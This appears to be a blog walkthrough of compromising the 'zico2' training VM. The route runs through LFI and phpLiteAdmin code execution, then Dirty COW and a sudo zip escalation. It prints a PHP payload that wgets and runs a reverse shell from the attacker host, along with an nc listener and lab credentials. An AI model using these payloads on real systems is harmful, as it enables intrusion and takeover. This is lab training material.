Overview
zico2 is boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in Bridge mode
- zico2 in Bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
- gcc
- pentestermonkey reverse shell.
Vulnerabilities Exploited:
- Default password
- Local file inclusion and phpliteadmin RCE
- Passwords misconfiguration
- Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)
- sudo misconfiguration
Reconnaissance
#netdiscover
Target VM IP Address: 192.168.8.104
Scanning
nmap
nmap -p- -A 192.168.8.104
Nmap findings:
- Target box is linux machine
- Secure shell on port 22
- web server on port 80
Exploit path 1 for shell: LFI, phpliteadmin RCE
Lets explore website in browser
Found LFI
Other than LFI, nothing fancy. Lets explore website with dirbuster
I found dbadmin directory with dirbuster.
http://192.168.8.105/dbadmin/ is “phpLiteAdmin v1.9.3”
Googled “phpLiteAdmin v1.9.3” vulnerabilities, and found default password “admin” along with other vulnerabilities.
Logged into “phpLiteAdmin” with “admin” password.
“phpLiteAdmin v1.9.3” is vulnerable to other vulnerabilities that we will exploit.
Before that, lets check if we can crack test users password hashes and reuse that password for secure shell.
md5 hash cracked online
root:653F4B285089453FE00E2AAFAC573414:34kroot34
zico:96781A607F4E9F5F423AC01F0DAB0EBD:zico2215@
these username:passwords are not reusable over ssh.
Next target is phpliteadmin v1.9.3 vulnerabilities. Lets google!
Lets exploit php remote code execution in phpliteadmin.
Before exploiting sql injection over server, lets host reverse-shell.php on attacking machine:192.168.8.105
http://192.158.8.105/shell.txt
and also start nc reverse connection handler on attacking machine.
nc -nvlp 1234
configuration on attacking machine is complete.
Now, attacking target box, i created database sahi, and renamed to sahi.php.
Then created a table with text column, and set default value to our code as:
<?php system(“wget 192.168.8.105/shell.txt -O /usr/databases/shell4.php; php /usr/databases/shell4.php”); ?>
access database file from browser
http://192.168.8.104/view.php?page=../../../../../../../../usr/databases/sahi.php
we received reverse shell connection
lets break shell jail
python -c “import pty; pty.spawn(‘/bin/bash’);”
exploring /home/zico/wordpres/wp-config.php we found database connection settings as
username:zico
password:sWfCsfJSPV9H3AmQzw8
Lets login to secure shell with this username and password.
Privilege Escalation 1: Linux Kernel 2.6.22 < 3.9 – ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege
Lets compile and root using this exploit https://www.exploit-db.com/exploits/40839/
Congrats! we are root.
Privilege Escalation 2: System misconfiguration.
zip utility is given sudo privileges. zip utility can execute system commands. Since, utitlity is provided with sudo privileges, every command is executed as root when zip utility is invoked with sudo. So lets invoke shell!!!
Congrats, we are 2nd time root!!!
Zeeshan Sahi's blog 